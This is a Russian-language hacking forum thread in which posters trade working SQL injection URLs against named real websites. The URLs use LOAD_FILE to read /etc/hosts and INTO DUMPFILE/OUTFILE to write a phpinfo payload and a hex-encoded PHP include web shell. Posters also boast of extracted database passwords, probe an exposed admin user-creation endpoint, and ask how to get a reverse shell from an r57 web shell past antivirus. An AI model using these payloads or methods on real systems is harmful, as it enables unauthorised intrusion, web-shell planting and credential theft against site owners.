1 А как ты пишешь в файл, если там что-то экранируется? 2 Прочитай индекс файл, или любой файл с веба. Уверен, что база там-же где сайт? Покажешь хоть один пример?
Пример читаем /etc/hosts http://www.dimex.ru/cat.php?p=-1&c=13+UNION+SELECT+LOAD_FILE(0x2F6574632F686F737473),2 в исходнике смортим он есть пишем <? phpinfo(); ?> http://www.dimex.ru/cat.php?p=-1&c=13+UNION+SELECT+0x3C3F20706870696E666F28293B203F3E,2+FROM+mysql.user+INTO+DUMPFILE+'/tmp/12345' читаем /tmp/12345 http://www.dimex.ru/cat.php?p=-1&c=13+UNION+SELECT+LOAD_FILE(0x2F746D702F3132333435),2 и ниче (
вот что ты говорил. Вот и покажи мне пример, где у юзера такие ПРАВА, что читать он может, а писать нет. Кавычки тут никакого отношения к делу не имеют
jokester да неправ я был ,ступил везде где нет кавычек и права для чтения я в /tmp могу писать сайтов 5-6 попробовал
Code: http://www.craigolsonsports.com/newsarticle.php?id=0809&nid=29546%20and%201=2%20union%20select%20user(),2+--+
1. -deleted- 2. Уже читал, пароли к БД вытащил, только с других хостов не пускает (как и положено) L I G A, Уже пробывал - всё равно не работает Ошибку пишет Да что за срань такая! Ведь если файлы читаются, значит для пользователя установлен флаг file_priv=y, значит и писать можно! Всё, по-другому никак. Или я не прав? А запрос может быть составлен так, чтобы конструкции into outfile и into dumpfile нельзя было использовать?
Code: http://site.com/calendar.php?event_id=681+union+select+null,0x3c3f 70687020696e636c75646528245f4745545b67675f696e635d 293b3f3e,null,null,null+into+outfile+0x2f706174682 f746f2f6d792f7363726970742e706870 ну может потому и не пишется что ты путь в hex'е вписал))
Блиа. ILYAtirtir, спасибо что разморочил. ) Отвечаю, что где-то на ачате видел такое. В памяти отложилось вот и писал так. Оказывается так нельзя ) Тогда другой вопрос: можно как-нибудь обойти кавычки?
Привет, наткнулся на сайт который на 80% написан на JS с использованием Аякса Почитам код наткнулся на функцию которая добавляет юзера PHP: function user_add2db() { if ((true) || (assertNotEmpty('adminUserAdd_login', 'Логин не может быть пустым!') && assertNotEmpty('adminUserAdd_password1', 'Пароль не может быть пустым!') && assertNotEmpty('adminUserAdd_name', 'Имя пользователя не может быть пустым!') && assertEqual('adminUserAdd_password1', 'adminUserAdd_password2', 'Пароль и его подтверждение не совпадают!'))) { new Ajax.Updater('notify', siteGetUrl()+'core/user_add2db', {evalScripts: true, parameters: { id: -1, login: $('adminUserAdd_login').value, name: $('adminUserAdd_name').value, password: $('adminUserAdd_password1').value, email: $('adminUserAdd_email').value, group: $('adminUserAdd_group').value, description: $('adminUserAdd_descr').value } }); } } Обратился к site.ru/core/user_add2db не передав параметров PHP: Notice: Undefined index: id in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 153 Notice: Undefined index: login in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 153 Notice: Undefined index: name in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 153 Notice: Undefined index: description in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 154 Notice: Undefined index: email in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 154 Notice: Undefined index: group in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 154 Notice: Undefined index: password in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 156 Fatal error: Call to a member function sid() on a non-object in /opt/htdocs/kid/site.ru/core/user.class.php on line 50 Вопрос в том как передать странице параметры (через GET не получается)
Значит так: 1. Есть шелл на сервере. 2. Есть NetCat у меня. По всей видимости на сервере стоит антивирь, т.к. при бек-коннекте с помощью встроенной ф-ции в r57 ничего не происходит. Брал так же другой скрипт для бек-коннект - ничего... Как сделать бек-коннект?